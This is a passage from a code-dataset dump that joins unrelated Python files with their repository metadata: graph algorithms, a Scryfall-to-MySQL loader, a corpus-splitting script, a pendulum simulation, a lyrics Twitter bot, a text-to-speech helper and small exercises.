observation locations\n \n self.X = X\n self.Y = Y\n self.source = source\n self.conc = conc\n self.boundary = boundary\n self.m = m\n","repo_name":"SheffieldML/advectionGPdatasets","sub_path":"advectionGPdatasets/ode_modelsample.py","file_name":"ode_modelsample.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5125041711","text":"import networkx as nx\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# print(dir(nx))\n# print(dir(pd))\n# print(help(nx.all_shortest_paths))\nans_1 = {\n 'A': ['B', 'G', 'H'],\n 'B': ['A', 'D', 'C'],\n 'C': ['B', 'D', 'E'],\n 'D': ['B', 'C', 'E', 'F', 'G', 'H'],\n 'E': ['C', 'D', 'F'],\n 'F': ['E', 'D', 'G'],\n 'G': ['A', 'F', 'D', 'H'],\n 'H': ['G', 'D', 'A']\n}\n\nG1 = nx.from_dict_of_lists(ans_1)\n# nx.draw_networkx(G, with_labels=True, node_color='Red', node_size=100)\n# plt.show(block=True)\n# node = nx.number_of_nodes(G)\n# # print(\"number of nodes {}\".format(node))\n# edges = nx.number_of_edges(G)\n# print(\"number of edges '{}' and node '{}'\".format(edges, node))\n# print(\"this the {} is connected {}\".format(ans_1, nx.is_connected(G)))\n\n\nroute = pd.read_csv('air_routes.csv', usecols=['source', 'dest', 'count'])\nG = nx.from_pandas_edgelist(route, 'source', 'dest', edge_attr='count')\n# nx.draw_networkx(G, with_labels=True, node_color='Green', node_size=10)\n# plt.show(block=True)\nprint(\" number of Airport '{}'\".format(nx.number_of_nodes(G)))\nprint(\" number of routes between two airport {}\".format(nx.number_of_edges(G)))\nshort = nx.shortest_paths.all_shortest_paths(G, 'ALB', 'SFO')\nprint(nx.is_tree(G1))\nprint(nx.is_connected(G1))\n\n","repo_name":"rushikeshnakhate/AI-Module2","sub_path":"week2/createGrapth.py","file_name":"createGrapth.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20757629702","text":"import sys\nimport math\n\nclass Grafo(object):\n\n\t\"\"\"Construtor da classe Grafo\"\"\"\n\tdef __init__(self, dados = None):\n\t\tself.dados = dados\n\t\tself.lista_adjacencia = {}\n\n\tdef cria_lista_adjacencia(self):\n\n\t\ttry:\n\t\t\t#percorro a lista de arestas\n\t\t\tfor i in self.dados['arestas']:\n\t\t\t\t#verifico se elas não possui peso\n\t\t\t\tif self.dados['tem_peso'] == False:\n\t\t\t\t\t#verifica se o vertice de origem está presente na lista de adjacencia\n\t\t\t\t\tif not i[0] in self.lista_adjacencia:\n\t\t\t\t\t\t#se nao tiver crio uma lista vazia para este vetor\n\t\t\t\t\t\tself.lista_adjacencia[i[0]] = []\n\t\t\t\t\t#adiciono na lista do vertice de origem, o vertice de destino e o peso 1\n\t\t\t\t\tself.lista_adjacencia[i[0]].append([i[1], 1])\n\t\t\t\t\t#verifico se o grafo é direcionado ou um digrafo\n\t\t\t\t\tif self.dados['eh_digrafo'] == False:\n\t\t\t\t\t\t# verifico se o vertice destino está na lista de adjacencia, se nao tiver crio um lista para ela\n\t\t\t\t\t\tif not i[1] in self.lista_adjacencia:\n\t\t\t\t\t\t\tself.lista_adjacencia[i[1]] = [] #cria a lista vazia\n\t\t\t\t\t\t#se nao existi o elemento origem na lista destino, adiciono ele\n\t\t\t\t\t\tif not i[0] in self.lista_adjacencia[i[1]]: \n\t\t\t\t\t\t\tself.lista_adjacencia[i[1]].append([i[0], 1])\n\t\t\t\telse:\n\t\t\t\t\tif not i[0] in self.lista_adjacencia:\n\t\t\t\t\t\tself.lista_adjacencia[i[0]] = []\n\n\t\t\t\t\tself.lista_adjacencia[i[0]].append([i[1], int( i[2] )])\n\n\t\t\t\t\tif self.dados['eh_digrafo'] == 
False:\n\t\t\t\t\t\tif not i[1] in self.lista_adjacencia:\n\t\t\t\t\t\t\tself.lista_adjacencia[i[1]] = []\n\t\t\t\t\t\tif not i[0] in self.lista_adjacencia[i[1]]:\n\t\t\t\t\t\t\tself.lista_adjacencia[i[1]].append([i[0],int( i[2] )])\n\n\t\t\treturn True\n\t\texcept:\n\t\t\treturn False\n\n\n\tdef calcula_distancia(self, caminho):\n\t\tv_atual = caminho.pop(0)\n\t\tdistancia = 0\n\n\t\ttry:\n\t\t\twhile len(caminho) > 0:\n\n\t\t\t\tfor aresta in self.lista_adjacencia[v_atual]:\n\n\t\t\t\t\tif caminho[0] == aresta[0]:\n\t\t\t\t\t\tdistancia += aresta[1]\n\t\t\t\t\t\tv_atual = caminho.pop(0)\n\t\t\t\t\t\tbreak;\n\n\t\t\treturn distancia\n\t\texcept:\n\t\t\treturn None\n\n\n\tdef busca_em_largura(self, origem, destino):\n\n\t\tv_atual = origem\n\t\tfila = []\n\t\tvisitados = []\n\t\trespostas = [[v_atual]]\n\n\t\ttry:\n\t\t\twhile v_atual != destino:\n\n\t\t\t\tif v_atual in self.lista_adjacencia:\n\t\t\t\t\tif not v_atual in visitados:\n\t\t\t\t\t\tfor i in self.lista_adjacencia[v_atual]:\n\t\t\t\t\t\t\tif i[0] not in visitados:\n\t\t\t\t\t\t\t\tvisitados += [v_atual]\n\t\t\t\t\t\t\t\tfila.append(i[0])\n\t\t\t\telse:\n\t\t\t\t\tvisitados += [v_atual]\n\n\t\t\t\tif fila:\n\t\t\t\t\trespostas.append(list(fila))\n\t\t\t\t\tv_atual = fila.pop(0)\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\n\t\t\treturn respostas\n\t\texcept:\n\t\t\treturn None\n\n\t\"\"\" profundidade usando pilha\n\tdef __busca_em_profundidade(self, origem, destino):\n\n\t\tv_atual = origem\n\t\tpilha = []\n\t\tvisitados = []\n\t\trespostas = [v_atual]\n\n\t\twhile v_atual != destino:\n\n\t\t\t#se o vertice atual ainda nao foi visitado\n\t\t\tif not v_atual in visitados:\n\t\t\t\tvisitados.append(v_atual) #adiciona a lista de visitados\n\t\t\t\tpilha.append(v_atual) #adiciona a pilha\n\n\t\t\texiste_vizinho = [False] #lista auxiliar que vai verificar se existe visito para meu vertice atual\n\n\t\t\t#verifica se meu vertice atual possui vizinhos\n\t\t\tif v_atual in self.lista_adjacencia:\n\t\t\t\t#percorro a lista de vizinhos\n\t\t\t\tfor i in self.lista_adjacencia[v_atual]:\n\t\t\t\t\t#se meu vizinho ainda nao foi visitado\n\t\t\t\t\tif not i[0] in visitados:\n\t\t\t\t\t\texiste_vizinho[0] = True #primeira posicao vai afirmar que existe vizinho que ainda nao foi visitado\n\t\t\t\t\t\texiste_vizinho.append(i[0]) #segunda posicao guarda o valor do vizinho\n\t\t\t\t\t\tbreak\n\t\t\telse: #se nao possui vizinhos\n\t\t\t\tpilha.pop(-1) #volto para o vertice anterior\n\t\t\t\tv_atual = pilha[len(pilha) - 1] # meu vertice atual recebe o vertice anterior\n\t\t\t\trespostas.append(v_atual)\n\t\t\t\tvisitados.append(v_atual) #falo que esse vertice que nao possui vizinhos ja foi vizitado\n\t\t\t\t#respostas.pop(-1) #removo ele da pilha de resposta\n\t\t\t\tcontinue #continue informa para meu loop parar aqui e começar na proxima volta\n\n\t\t\t#verifico se existe vizinho (filhos do vertice atual) a serem percorridos\n\t\t\tif existe_vizinho[0]:\n\t\t\t\tv_atual = existe_vizinho[1] #o vertice atual agora é o vizinho\n\t\t\t\trespostas.append(v_atual) #coloca o elemento na nossa pilha de resposta\n\t\t\telse: #se nao existe um vizinho\n\t\t\t\tpilha.pop(-1) #removo o elemento do topo da pilha\n\t\t\t\tv_atual = pilha[len(pilha) - 1] #vertice passa a ser o ultimo elemento da pilha \n\t\t\t\trespostas.append(v_atual)\n\t\t\t\t#respostas.pop(-1) #removo da pilha de resposta\n\t\t\t\t#se a pilha estiver vazia, paro o loop com break\n\t\t\t\tif len(pilha) == 0:\n\t\t\t\t\tbreak\n\t\t\t\n\n\t\treturn respostas \n\t\"\"\"\n\n\tdef busca_em_profundidade(self, 
origem, destino):\n\n\t\tfila = []\n\t\tvisitados = []\n\t\trespostas = [[origem]]\n\t\tv_atual = origem\n\n\t\ttry:\n\t\t\twhile v_atual != destino:\n\n\t\t\t\tif v_atual in self.lista_adjacencia:\n\t\t\t\t\t\n\t\t\t\t\tif not v_atual in visitados:\n\t\t\t\t\t\tindice = 0\n\t\t\t\t\t\tfor i in self.lista_adjacencia[v_atual]:\n\t\t\t\t\t\t\tif i[0] not in visitados:\n\t\t\t\t\t\t\t\tvisitados += [v_atual]\n\t\t\t\t\t\t\t\tfila.insert(indice, i[0])\n\t\t\t\t\t\t\t\tindice += 1\n\t\t\t\telse:\n\t\t\t\t\tvisitados += [v_atual]\n\n\t\t\t\tif len(fila) > 0:\n\t\t\t\t\trespostas.append(list(fila))\n\t\t\t\t\tv_atual = fila.pop(0)\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\t\n\t\t\treturn respostas\n\t\texcept:\n\t\t\treturn None\n\n\tdef dijkstra(self, origem, destino):\n\n\t\tv_atual = []\n\t\tdistancia = {}\n\t\tvisitados = []\n\t\tv_anterior = {}\n\t\tprioridade = []\n\n\t\t# initialise the distance of every vertex to infinity\n\t\tfor i in self.lista_adjacencia:\n\t\t\tfor j in self.lista_adjacencia[i]:\n\t\t\t\tdistancia[j[0]] = math.inf\n\n\t\tdistancia[origem] = 0\n\n\t\tprioridade.append([origem, distancia[origem]])\n\n\t\ttry:\n\t\t\twhile len(prioridade) > 0:\n\n\t\t\t\tv_atual = list(prioridade.pop(0))\n\n\t\t\t\tif v_atual[0] in self.lista_adjacencia:\n\n\t\t\t\t\tif not v_atual[0] in visitados:\n\n\t\t\t\t\t\tvisitados.append(v_atual[0]) # store only the vertex, not the [vertex, distance] pair, so the membership test above works\n\n\t\t\t\t\t\tfor i in self.lista_adjacencia[v_atual[0]]:\n\n\t\t\t\t\t\t\tif distancia[i[0]] > (distancia[v_atual[0]] + i[1]):\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\tdistancia[i[0]] = distancia[v_atual[0]] + i[1]\n\t\t\t\t\t\t\t\tprioridade.append( [ i[0], distancia[i[0]] ] )\n\t\t\t\t\t\t\t\tv_anterior[i[0]] = v_atual[0]\n\n\t\t\t\telse:\n\t\t\t\t\tcontinue\n\n\t\t\tcaminho = [destino]\n\t\t\tv_aux = destino\n\n\t\t\twhile(True):\n\n\t\t\t\tif v_aux in v_anterior:\n\t\t\t\t\tcaminho.append( v_anterior[v_aux] )\n\t\t\t\t\tv_aux = v_anterior[v_aux]\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\n\t\t\treturn {'caminho': caminho, 'distancia': distancia[destino]}\n\t\texcept:\n\t\t\treturn None\n\n\tdef prim(self, origem):\n\n\t\ttry:\n\t\t\tvisitados = [str(origem)]\n\t\t\tvertices = list(self.dados['vertices'])\n\t\t\tvertices.remove(str(origem))\n\t\t\tdistancia = 0\n\t\t\trespostas = {'caminho': [], 'distancia': None}\n\n\t\t\twhile len(vertices) > 0:\n\n\t\t\t\ta_menor = math.inf\n\t\t\t\tv_menor = None\n\t\t\t\tv_atual = None\n\n\t\t\t\tfor v in visitados:\n\t\t\t\t\tif v in self.lista_adjacencia:\n\t\t\t\t\t\tfor i in self.lista_adjacencia[v]:\n\n\t\t\t\t\t\t\tif not i[0] in visitados:\n\n\t\t\t\t\t\t\t\tif i[1] < a_menor:\n\t\t\t\t\t\t\t\t\ta_menor = i[1]\n\t\t\t\t\t\t\t\t\tv_menor = i[0]\n\t\t\t\t\t\t\t\t\tv_atual = v\n\n\t\t\t\tdistancia += a_menor # accumulate only the edge that was finally chosen, not every candidate seen during the scan\n\n\t\t\t\trespostas['caminho'].append( list([v_atual, v_menor, a_menor]) )\n\n\t\t\t\tvisitados.append(v_menor)\n\t\t\t\tvertices.remove(v_menor)\n\t\t\t\n\t\t\trespostas['distancia'] = distancia\n\n\t\t\treturn respostas\n\t\texcept:\n\t\t\treturn None\n","repo_name":"robsonalvesbh/grafos","sub_path":"Models/Grafo.py","file_name":"Grafo.py","file_ext":"py","file_size_in_byte":6954,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"} +{"seq_id":"4127495507","text":"# This is a sample Python script.\n\n# Press Shift+F10 to execute it or replace it with your code.\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\nimport requests\nimport pandas as pd\nfrom sqlalchemy import create_engine\nimport json\nimport util\n\nclass 
DbLoader():\n    \"\"\"\n    Class that handles data I/O between the Scryfall API and the MySQL database.\n    \"\"\"\n    def __init__(self, \n                 credentials: dict, \n                 run_id: int ):\n        self.run_id = run_id\n        self.credentials = credentials\n\n    def fetch_data(self) -> pd.DataFrame:\n        \"\"\"\n        Fetches the scryfall bulk-data from the API and returns the daily updated data as a pandas DataFrame.\n        :return: DataFrame with bulk-data\n        \"\"\"\n        api_path = \"https://api.scryfall.com/bulk-data\"\n        # Get info for bulk data download\n        print(\"Fetching data from scryfall: {api_path}\".format(api_path=api_path))\n        r = requests.get(api_path)\n        print(\"Status code: \", r.status_code)\n        tmp_json = r.json()\n        dl_url = tmp_json['data'][0]['download_uri']\n        print(\"Downloading bulk-data: \", dl_url)\n        r_dl = requests.get(dl_url)\n        print(\"Complete! \")\n        # load json file into pandas dataframe\n        print(\"Loading JSON file to pandas DataFrame\")\n        df = pd.DataFrame.from_dict(data=r_dl.json(), orient='columns')\n        return df\n\n    def fetch_table_from_db(self, run_id: int=None, table_name: str='bulk_data') -> pd.DataFrame:\n        \"\"\"\n        Fetches a table corresponding to a run_id and table_name from the mySQL database and returns it as a pandas DataFrame.\n        :param run_id: run_id from the selected table.\n        :param table_name: Name of the table to be fetched from the database.\n        :return: DataFrame with bulk-data\n        \"\"\"\n        credentials = self.credentials\n        _run_id = self.run_id\n        if run_id is not None:\n            _run_id = run_id\n        # Create SQLAlchemy engine to connect to MySQL Database\n        engine = create_engine(\"mysql+pymysql://{user}:{pw}@{host}/{db}\"\n                               .format(host=credentials['hostname'], db=credentials['dbname'], user=credentials['uname'],\n                                       pw=credentials['pwd']))\n        # Loading bulk data from sql database\n        print(f\"..loading {table_name} from sql database..\")\n        df = pd.read_sql(f\"select * from {table_name} where RUN_ID = {str(_run_id)};\", con=engine)\n        print(\"..complete..\")\n        return df\n\n    def load_data_to_db(self, df: pd.DataFrame, replace_table: bool=False, table_name: str='bulk_data'):\n        \"\"\"\n        Loads a table with table_name to the mySQL database.\n        :param df: Table to be loaded into database.\n        :param replace_table: Signals if an existing table will be replaced.\n        :param table_name: Name of the table to be loaded to the database.\n        \"\"\"\n        # Credentials to database connection\n        credentials = self.credentials\n        # Create SQLAlchemy engine to connect to MySQL Database\n        engine = create_engine(\"mysql+pymysql://{user}:{pw}@{host}/{db}\".format(host=credentials['hostname'], \n                        db=credentials['dbname'], user=credentials['uname'],pw=credentials['pwd']))\n        # Load dataframe to sql table\n        print(\"..loading bulk data to SQL database..\")\n        if replace_table:\n            df.to_sql(table_name, engine, index=False, if_exists=\"replace\")\n        else:\n            df.to_sql(table_name, engine, index=False, if_exists=\"append\")\n        print(\"..loading complete..\")\n\n","repo_name":"PatKiese/MTG_Market_Watch","sub_path":"DbLoader.py","file_name":"DbLoader.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"28802077430","text":"# read the data.txt file\nf = open(\"data.txt\", \"r\")\n# for each line of the file\nfor line in f: \n\t# clean up the line with strip\n\tligne = line.strip()\n\t# check whether the email is valid\n\tif ligne.find('@') != -1 and ligne.endswith('.com'):\n\t\tprint('valid email')\n\telse:\n\t\tprint(\"invalid email\")\n\n# close the 
file\nf.close()","repo_name":"LHerouin/exos_piscine_python","sub_path":"ex22.py","file_name":"ex22.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71321530557","text":"def binarysearch(a,low,high,ele):\n    if(high >= low):\n        mid=(high+low)//2\n        if(a[mid]==ele):\n            return mid\n        elif a[mid] > ele:\n            return binarysearch(a,low,mid-1,ele)\n        else:\n            return binarysearch(a,mid+1,high,ele)\n\n    else:\n        return -1\n\n\narray=[]\nsize=int(input(\"enter the size of array:\"))\nprint(\"enter the array elements:\")\nfor i in range(size):\n    ele=int(input())\n    array.append(ele)\nprint(\"the array elements are:\")\nfor i in range(size):\n    print(array[i],end=' ')\n\nelement=int(input(\"\\nenter the element to search:\"))\nresult=binarysearch(array,0,len(array)-1,element)\nif(result==-1):\n    print(\"element is not found in the array\")\nelse:\n    print(\"element is found at array index:\", result)\n\n","repo_name":"shravanimula/Python_oct","sub_path":"sorting_algoritham/binarysearch.py","file_name":"binarysearch.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"42302665570","text":"#!/usr/bin/env python\n\n# Split JNLPBA corpus data into single document per file.\n\n# Data available from\n#\n# http://www-tsujii.is.s.u-tokyo.ac.jp/GENIA/ERtask/report.html\n#\n# Given the JNLPBA data, run this script e.g. as\n#\n# python jnlpbasplit.py -d train/ Genia4ERtask2.iob2\n# python jnlpbasplit.py -d test/ Genia4EReval2.iob2\n\nimport sys\nimport os\nimport re\n\noptions = None\n\n# regular expression for new document start\nNEWDOC_RE = re.compile(r'^###MEDLINE:(\\d+)$')\n\nDEFAULT_SUFFIX = 'conll'\nDEFAULT_DIR = 'JNLPBA'\n\ndef argparser():\n    import argparse\n    \n    ap=argparse.ArgumentParser(description='Split JNLPBA corpus data into ' +\n                               'single document per file.')\n    ap.add_argument('-s', '--suffix', default=DEFAULT_SUFFIX, metavar='SUFF',\n                    help='output file suffix (default ' + DEFAULT_SUFFIX + ')')\n    ap.add_argument('-d', '--directory', default=DEFAULT_DIR, metavar='DIR',\n                    help='output directory (default ' + DEFAULT_DIR + ')')\n    ap.add_argument('-v', '--verbose', default=False, action='store_true', \n                    help='verbose output')    \n    ap.add_argument('data', metavar='DATA', nargs=1, \n                    help='JNLPBA data (e.g. 
Genia4ERtask2.iob2)')\n    return ap\n\ndef output(lines, PMID):\n    global options\n\n    if not lines:\n        return False\n\n    assert PMID is not None, 'Missing PMID'\n\n    if PMID not in output.written:\n        base = PMID\n    else:\n        # duplicate PMID; find first numeric affix giving a filename\n        # that has not been used.\n        i = 2\n        while True:\n            base = '%s-%d' % (PMID, i)\n            if base not in output.written:\n                break\n            i += 1\n        if options.verbose:\n            print >> sys.stderr, 'Duplicate PMID %s, writing %s' % (PMID, base)\n\n    fn = os.path.join(options.directory, base+'.'+options.suffix)\n    with open(fn, 'wt') as f:\n        f.write('\\n'.join(lines))\n    output.written[base] = True\n\n    return True\noutput.written = {}\n\ndef process(fn):\n    with open(fn, 'rU') as f:\n        PMID = None\n        lines = []\n        skipempty = False\n        for l in f:\n            l = l.rstrip('\\n')\n\n            if skipempty:\n                assert not l or l.isspace(), \\\n                    'Missing empty line after PMID %s' % PMID\n                skipempty = False\n                continue\n\n            m = NEWDOC_RE.match(l)\n            if m:\n                output(lines, PMID)\n                PMID = m.group(1)\n                lines = []\n                # skip empty following PMID line\n                skipempty = True\n            else:\n                lines.append(l)\n\n        # last doc\n        output(lines, PMID)\n\ndef main(argv=None):\n    global options\n\n    if argv is None:\n        argv = sys.argv\n\n    options = argparser().parse_args(argv[1:])\n\n    process(options.data[0])\n\n    return 0\n\nif __name__ == '__main__':\n    sys.exit(main(sys.argv))\n","repo_name":"spyysalo/jnlpba","sub_path":"conversion/jnlpbasplit.py","file_name":"jnlpbasplit.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"24996703900","text":"import numpy as np\nimport sys\nimport os\nclear = lambda: os.system('cls')\nclear()\n\nsys.path.insert(0, '../lib/')\nimport file_IO as IO\nimport add_label as AL\n\nprint('################### GET FILES ############')\nPS = '\\\\'; print('PS = '+PS+'\\n')\nroot_folder = 'F:'+PS+'Property_of_C_Kawczynski'+PS\nroot = root_folder+'SIMS'+PS+'BC_full'+PS+'results_from_prospectus'+PS\ntarget = root_folder+'SIMS'+PS+'BC_full'+PS+'results_from_prospectus'+PS+'post_processed'+PS\n\nlabel_font_size = 5\nL = AL.init_macro()\nL = AL.set_label_font_size(L,label_font_size)\nX_n_rakes = 2; Xrange = [-.5,0]\nY_n_rakes = 7; Yrange = [-.8,.99]\n\nZ_n_rakes = 3; Zrange = [-1,1]\nX = np.linspace(Xrange[0],Xrange[1],X_n_rakes)\nY = np.linspace(Yrange[0],Yrange[1],Y_n_rakes)\nZ = np.linspace(Zrange[0],Zrange[1],Z_n_rakes)\n# X = [0]\n# Y = [0]\n# Z = [-1.049]\nZ = [0]\n# Z_rake = [-1.049,1.049]\n\nfor x in X:\n\tfor y in Y:\n\t\tfor z in Z:\n\t\t\tL = AL.append_label(L,x,y,z)\n\nIO.set_file_contents('add_mesh_of_labels.mcr','\\n'.join(L))\n# IO.set_file_contents(target+'streamtraces.mcr','\\n'.join(L))\n\n\nprint('\\n Finished')\n\nIO.delete_pyc_files()","repo_name":"charleskawczynski/MOONS","sub_path":"python/post_processing/add_mesh_label/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"96"} +{"seq_id":"220641727","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 24 19:47:33 2018\r\n\r\n@author: Jared\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy.integrate\r\nfrom scipy.integrate import odeint\r\n\r\n#initial conditions\r\ntini = 0\r\ntfin = 10\r\ntime = np.arange(tini, tfin, .025)\r\ndeg = 15.0 # Anything above around 10 degrees will break the linear (small-angle) approximation\r\ntheta0 = np.radians(deg)\r\navx0 = 
np.radians(0.0) # Angular velocity\r\n\r\n#define equations and functions\r\ndef simple_pendulum(y0,t):\r\n theta, x = y0\r\n d2theta = [x, -(g/L)*np.sin(theta)]\r\n return d2theta\r\n\r\ndef plot_results(time, theta1, theta2):\r\n plt.plot(time, theta1[:,0], \"r\")\r\n plt.plot(time, theta2)\r\n \r\n plt.title('Pendulum Motion')\r\n plt.xlabel('time(s)')\r\n plt.ylabel('angle (rads)')\r\n plt.grid(True)\r\n plt.legend(['nonlinear', 'linear'], loc='lower right')\r\n plt.show()\r\n \r\n \r\n#parameters\r\ng = 9.8 # m/s^2\r\nL = 1.0 # m\r\n# Find solution to nonlinear problem\r\ntheta1 = odeint(simple_pendulum, [theta0, avx0], time)\r\n\r\n# Find solution to linear problem\r\nomega = np.sqrt(g/L)\r\ntheta2 = [theta0*np.cos(omega*t) for t in time] # Stores as a list in theta2\r\n\r\n# Plot results\r\nplot_results(time, theta1, theta2)\r\n\r\n# Amplitude vs Frequency of Oscillation\r\n","repo_name":"ladosamushia/PHYS639","sub_path":"Pendulum/jmschulerhw2p1.py","file_name":"jmschulerhw2p1.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"18357638641","text":"import twython, time, sys, random, os, calendar\n\n# Twitter keys stored as config vars in Heroku\nclient = twython.Twython(os.environ['CONSUMER_KEY'], os.environ['CONSUMER_SECRET'], os.environ['ACCESS_KEY'], os.environ['ACCESS_SECRET'])\n\nalbums = {\n\t1: \"TheSunsetTree.txt\",\n\t2: \"Tallahassee.txt\",\n\t3: \"AllHailWestTexas.txt\",\n\t4: \"BeatTheChamp.txt\",\n\t5: \"Goths.txt\",\n\t6: \"TranscendentalYouth.txt\",\n\t7: \"AllEternalsDeck.txt\"\n}\nnumAlbums = len(albums)\n\n# Randomly select an album to tweet from\nlyricsFile = albums[random.randint(1, numAlbums)]\n\n# Read the lyrics file\nfilename = open(lyricsFile,'r')\nf = filename.readlines()\nfilename.close()\n\nstartLine = random.randint(0, len(f) - 1)\n# Don't use blank lines\nwhile f[startLine] == \"\\n\":\n\tstartLine += 1\n\ntweet = f[startLine]\n# Add the next line if there is one, it's not blank, and the resulting tweet isn't over 140 characters\nif (startLine < len(f) - 1) and (f[startLine + 1] != \"\\n\") and (len(tweet + f[startLine + 1]) <= 140):\n\ttweet += f[startLine + 1]\n\n# Print lyric(s) to log and post tweet\nprint(tweet)\nclient.update_status(status=tweet)\n","repo_name":"andynelson34/MtnGoatsBot","sub_path":"mtnGoatsBot.py","file_name":"mtnGoatsBot.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"36980037895","text":"from __future__ import division, unicode_literals\nimport argparse\nimport pandas as pd\nimport onmt.opts\n\n\ndef get_rank(row, base, max_rank):\n for i in range(1, max_rank+1):\n if row['target'] == row['{}{}'.format(base, i)]:\n return i\n return 0\n\n\ndef main(opt):\n if opt.ignore_last_number:\n with open(opt.targets, 'r') as f:\n targets = [''.join(line.strip().split(' ')[:-1])\n for line in f.readlines()]\n else:\n with open(opt.targets, 'r') as f:\n targets = [''.join(line.strip().split(' '))\n for line in f.readlines()]\n predictions = [[] for i in range(opt.beam_size)]\n\n test_df = pd.DataFrame(targets)\n test_df.columns = ['target']\n\n with open(opt.predictions, 'r') as f:\n # print(len(f.readlines()))\n test_df = test_df.iloc[:int(len(f.readlines())/opt.beam_size)]\n print(len(test_df))\n total = len(test_df)\n with open(opt.predictions, 'r') as f:\n # print(len(f.readlines()))\n if opt.ignore_last_number:\n for i, line 
in enumerate(f.readlines()):\n\n                predictions[i % opt.beam_size].append(\n                    ''.join(line.strip().split(' ')[:-1]))\n        else:\n            for i, line in enumerate(f.readlines()):\n\n                predictions[i % opt.beam_size].append(\n                    ''.join(line.strip().split(' ')))\n\n    for i, preds in enumerate(predictions):\n        test_df['prediction_{}'.format(i + 1)] = preds\n\n    test_df['rank'] = test_df.apply(lambda row: get_rank(\n        row, 'prediction_', opt.beam_size), axis=1)\n\n    correct = 0\n\n    for i in range(1, opt.beam_size+1):\n        correct += (test_df['rank'] == i).sum()\n\n        print('Top-{}: {:.1f}%'.format(i, correct / total * 100))\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(\n        description='score_predictions.py',\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n    parser.add_argument('-beam_size', type=int, default=5,\n                        help='Beam size')\n    parser.add_argument('-invalid_smiles', action=\"store_true\",\n                        help='Show % of invalid SMILES')\n    parser.add_argument('-predictions', type=str, default=\"\",\n                        help=\"Path to file containing the predictions\")\n    parser.add_argument('-targets', type=str, default=\"\",\n                        help=\"Path to file containing targets\")\n    parser.add_argument('-ignore_last_number', action='store_true',\n                        help=\"Whether or not to ignore the last number.\")\n    opt = parser.parse_args()\n    main(opt)\n","repo_name":"wjm41/smi2wyk","sub_path":"smi2wyk/score_predictions.py","file_name":"score_predictions.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"35959223201","text":"import requests\nimport pygame\n\n# Function to create a voiceover from the text response\ndef create_voiceover(text, api_key):\n    headers = {\n        \"Authorization\": f\"Bearer {api_key}\"\n    }\n    payload = {\n        \"model\": \"tts-1\",\n        \"input\": text,\n        \"voice\": \"onyx\",\n    }\n\n    response = requests.post(\"https://api.openai.com/v1/audio/speech\", headers=headers, json=payload)\n    return response.content\n\n# Function to save the MP3 data to a file\ndef save_mp3(data, file_path):\n    with open(file_path, 'wb') as file:\n        file.write(data)\n\n# Function to play the MP3 file\ndef play_mp3(file_path):\n    pygame.mixer.init()\n    pygame.mixer.music.load(file_path)\n    pygame.mixer.music.play()\n    while pygame.mixer.music.get_busy(): \n        pygame.time.Clock().tick(10)\n","repo_name":"Jukka-Sun/SnippingGPT","sub_path":"voiceover.py","file_name":"voiceover.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"74513294396","text":"# Bellman-Ford algorithm to find the shortest paths in a graph\n\ndef court_chemin(graph, depart):\n    dist = {sommet : float('inf') for sommet in graph}\n    dist[depart]=0\n    for i in range(len(graph)-1):\n        for sommet in graph :\n            for voisin, poid in graph[sommet].items():\n                if dist[sommet]+poid < dist[voisin]:\n                    dist[voisin]=dist[sommet]+poid\n    return dist","repo_name":"Heryklug/court_chelmin","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"30783977970","text":"# O(N) in space and time for solution\n\n\nfrom typing import List, Optional\n\nclass Solution():\n    def __init__(self):\n        pass\n    \n    def partition(self, in_list: List[int])-> Optional[List[List[int]]]:\n        if len(in_list) < 3:\n            return None\n        # Get sum\n        S = sum(in_list)\n        \n        # check if divisible by three\n        if S % 3 != 0:\n            
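# non-zero remainder means no equal 3-way split exists; e.g. sum([3, 5, 8, 0, 8]) == 24 passes, since 24 % 3 == 0 each part must total 8\n            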
